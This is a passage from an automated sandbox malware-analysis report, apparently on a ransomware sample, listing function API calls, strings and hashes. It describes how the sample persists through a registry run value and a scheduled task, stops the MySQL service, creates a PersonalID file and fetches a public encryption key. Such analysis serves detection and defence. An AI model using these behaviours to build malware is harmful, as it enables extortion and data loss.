                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: fbc77cc498550a4e3b731c30b74669f6a252f715d9748c97d8d979bca2ca3e70
                                                                                                        • Instruction ID: d7bf4ca59df457ff9de56cc0a9956e3a2c1ef74ac485965436c57af47d027377
                                                                                                        • Opcode Fuzzy Hash: fbc77cc498550a4e3b731c30b74669f6a252f715d9748c97d8d979bca2ca3e70
                                                                                                        • Instruction Fuzzy Hash: 6CC1B071701215DFDB18CF08EC81A6E77A6EF44794B24892DE891CB381CB30ED56AB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F1DAEB
                                                                                                        • CoCreateInstance.OLE32(00FE4F6C,00000000,00000001,00FE4F3C,?,?,00FDA948,000000FF), ref: 00F1DB0B
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F1DBD6
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00FDA948,000000FF), ref: 00F1DBE3
                                                                                                        • _memset.LIBCMT ref: 00F1DC38
                                                                                                        • CoUninitialize.OLE32 ref: 00F1DC92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                        • API String ID: 330603062-1376107329
                                                                                                        • Opcode ID: e1ca6ccea7ad904deff4a24e26981ede46dfca476443831359ed518e762aa264
                                                                                                        • Instruction ID: 2a3d67a021bd9c038f1a102111cc0df72660fb74c6058a3e2261f8a81c2ab9b1
                                                                                                        • Opcode Fuzzy Hash: e1ca6ccea7ad904deff4a24e26981ede46dfca476443831359ed518e762aa264
                                                                                                        • Instruction Fuzzy Hash: C2512370A4024AAFCB00DF94CC89FAE77B9FF88B05F108558F505AB290DBB5A945CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00F21A1D
                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00F21A32
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00F21A46
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F21A5B
                                                                                                        • Sleep.KERNEL32(?), ref: 00F21A75
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F21A80
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F21A9E
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F21AA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                        • String ID: MYSQL
                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                        • Opcode ID: 9f27b672c6d181d0f8dadcacaea404517138a15070b0b70f1f7089d5189e4ea5
                                                                                                        • Instruction ID: 296adc52c1f3977133143141c60b69fc08ffe2f58aadd0bf8e7576d3914ed272
                                                                                                        • Opcode Fuzzy Hash: 9f27b672c6d181d0f8dadcacaea404517138a15070b0b70f1f7089d5189e4ea5
                                                                                                        • Instruction Fuzzy Hash: AB11A331E0221AABDB205BA4AC4DFAF7BBDEB45761F040111FA00E6140D728D945EEE4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F5F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F27F
                                                                                                          • Part of subcall function 00F40CFC: std::exception::_Copy_str.LIBCMT ref: 00F40D15
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F294
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,?,0101793C,?,?,?,?,?,00F33B9C,?,0101793C,?,00000001), ref: 00F40F1F
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F2AD
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F2C2
                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 00F5F2D4
                                                                                                          • Part of subcall function 00F5EF74: std::exception::exception.LIBCMT ref: 00F5EF8E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F2E2
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F2FB
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F310
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                        • String ID: bad function call
                                                                                                        • API String ID: 2464034642-3612616537
                                                                                                        • Opcode ID: e4fac89b28dabec3e28cab50afafde193179077a10228d70422e9c61ce6a2491
                                                                                                        • Instruction ID: 9a099d38b344b3b62c2b57f211a8aba58068a6a026cd89a340a61fa55a37eec2
                                                                                                        • Opcode Fuzzy Hash: e4fac89b28dabec3e28cab50afafde193179077a10228d70422e9c61ce6a2491
                                                                                                        • Instruction Fuzzy Hash: E211EC74D0020DBBCF00EFA5C985CDDBBBCEA04344B448566BE2497546EB78A3199B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F75480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00F754C8
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F754D4
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00F754F7
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F75503
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00F75531
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00F7555B
                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00F755F5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                        • Opcode ID: ee9d1049d0c09f2ee7a9d3dc21bfb0b9655a17dd22ea2bb4a59da9fac41658b8
                                                                                                        • Instruction ID: 22b2f07c215128af157ef7dd4bfa2f0f1ba972c4860f84bb43b63572117e5cb7
                                                                                                        • Opcode Fuzzy Hash: ee9d1049d0c09f2ee7a9d3dc21bfb0b9655a17dd22ea2bb4a59da9fac41658b8
                                                                                                        • Instruction Fuzzy Hash: 2C514B31E40609BBEB206B648C03FBF776AAF45B20F044167FE05AB1D1D6A59D05A6A3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F30FDD: __wfsopen.LIBCMT ref: 00F30FE8
                                                                                                        • _fgetws.LIBCMT ref: 00F1C7BC
                                                                                                        • _memmove.LIBCMT ref: 00F1C89F
                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00F1C94B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2864494435-54166481
                                                                                                        • Opcode ID: eccf11d53dc3f027425859f2223b57ccaa3f282eed969ce5c0beff81be41b7dc
                                                                                                        • Instruction ID: 80bfc551ae72081752f6e4119e2ae9157c68cfd90c6f2fce0caf7e9b0a2dc098
                                                                                                        • Opcode Fuzzy Hash: eccf11d53dc3f027425859f2223b57ccaa3f282eed969ce5c0beff81be41b7dc
                                                                                                        • Instruction Fuzzy Hash: E091E272D403199BDF21DFA4CC817EEB7B4AF04324F140529E805A3241E779AE84EBE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 00F1F338
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F1F353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                        • Opcode ID: 00af3a5871eb09f0de44c7be120960b27bb35bf3901a47f75abef459971247f1
                                                                                                        • Instruction ID: 0636d4fdd06ca84606823be8b7111837fd1533d08c5ea2b1429f231e77a3ea0f
                                                                                                        • Opcode Fuzzy Hash: 00af3a5871eb09f0de44c7be120960b27bb35bf3901a47f75abef459971247f1
                                                                                                        • Instruction Fuzzy Hash: 15C15971D01219EBDF00DFA4DD8ABDEBBB5BF14308F144029E405AB250EB79AA58DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                        • Opcode ID: b2ce512d6a67865e3fa41561dc098461e005b5487d7bab0be8155e60a3af45e1
                                                                                                        • Instruction ID: f0366f06331f9dff8882d69f5133db8001bd98740f2888ecc004903134478cd6
                                                                                                        • Opcode Fuzzy Hash: b2ce512d6a67865e3fa41561dc098461e005b5487d7bab0be8155e60a3af45e1
                                                                                                        • Instruction Fuzzy Hash: 03A142B1C00259DBEF11EFE4DC56BDEBB75AF14314F140028E40577282D7BA5A98EBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F73350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                        • API String ID: 909875538-2908105608
                                                                                                        • Opcode ID: e65d30b4e54d7de6c00591f13d43ac5195f91982d55b8f12e6dba2d4df3bb017
                                                                                                        • Instruction ID: 0de97af402abe0aec42b1a24db2f4819ed682db507e99e263b75940bc0ef9c67
                                                                                                        • Opcode Fuzzy Hash: e65d30b4e54d7de6c00591f13d43ac5195f91982d55b8f12e6dba2d4df3bb017
                                                                                                        • Instruction Fuzzy Hash: 264148A1F8835579F731A929BC03F9673815F51B21F088422FB8CE91C2F7858547B293
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 00F1C6C2
                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F1C6F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1C700
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00F1C725
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1C72E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                        • Opcode ID: 4b268eac27cdd5d602594fd408053afcbc2e1d4e50d0f336b562597725bd9120
                                                                                                        • Instruction ID: d87d5d49a9da14bb2993553681f5605227cca6f23c9a71a4bd88e756ac0bae4d
                                                                                                        • Opcode Fuzzy Hash: 4b268eac27cdd5d602594fd408053afcbc2e1d4e50d0f336b562597725bd9120
                                                                                                        • Instruction Fuzzy Hash: 80111B7594030DFBEF219FA0CC4ABEEBB79EB04B18F104195EA00F6191D7B15A54FA90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F2E707
                                                                                                          • Part of subcall function 00F1C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C51B
                                                                                                        • InternetOpenW.WININET ref: 00F2E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F2E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F2E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F2E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F2E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F2E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F2E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F2E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F2EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F2EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F2EB86
                                                                                                        • _memset.LIBCMT ref: 00F2EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F2EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F2EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EC32
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                        • Opcode ID: 545561ee216c8b63e77648041b15427e21ad42700d7ce7aebfd7fc9b52bd1423
                                                                                                        • Instruction ID: 44199bf613038b18c8776fa5ec87ec5ced6d82209fcef71c2be32d9a9e6e668d
                                                                                                        • Opcode Fuzzy Hash: 545561ee216c8b63e77648041b15427e21ad42700d7ce7aebfd7fc9b52bd1423
                                                                                                        • Instruction Fuzzy Hash: 77015231448396ABDA30DF209C05BDF7BD9AF51754F144819F98496182EB749208E797
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F3728B Relevance: 12.2, APIs: 8, Instructions: 202COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
